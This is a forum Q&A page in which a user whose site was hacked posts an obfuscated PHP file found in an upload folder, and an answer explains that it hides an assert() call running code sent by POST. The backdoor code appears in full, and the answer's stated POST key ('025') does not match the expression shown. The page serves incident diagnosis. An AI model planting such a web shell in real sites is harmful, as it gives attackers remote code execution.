James0325
Reputation: 51
Unknown PHP file in my upload folder, isn't malicious code?
Recently i found out my project got hacked and i found a script in my images folder which where a directory for user to upload their images (using file input). Here is the script that i found in the directory.
errot_db.php
<?php
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);
?>
Upvotes: 1
Views: 317
Answers (1)
ChristianF
Reputation: 2061
This code hides the following statement:
@assert ($_POST[025]);
Which means it'll execute the PHP code send in the POST variable "025". So, yes, this is indeed a backdoor! I recommend asking on security.stackexchange.com for help on how to properly deal with the fallout.
Upvotes: 6
Related Questions
- I have been hacked, now I have a weird PHP file. What is it doing?
- Browser downloaded this unobfuscated PHP script. What is it doing?
- Malicious code found in PHP files. What does it do?
- Strange PHP code found in file on server
- A suspected code uploaded in my website
- A suspicious PHP file might
- What is this script doing (found in Wordpress uploads folder)
- Malicious PHP code injected into a PHP file
- Found a hidden php FILE/(CODE) in WordPress ROOT. Is this a Backdoor? Should I delete it?
- hacked website unusual php file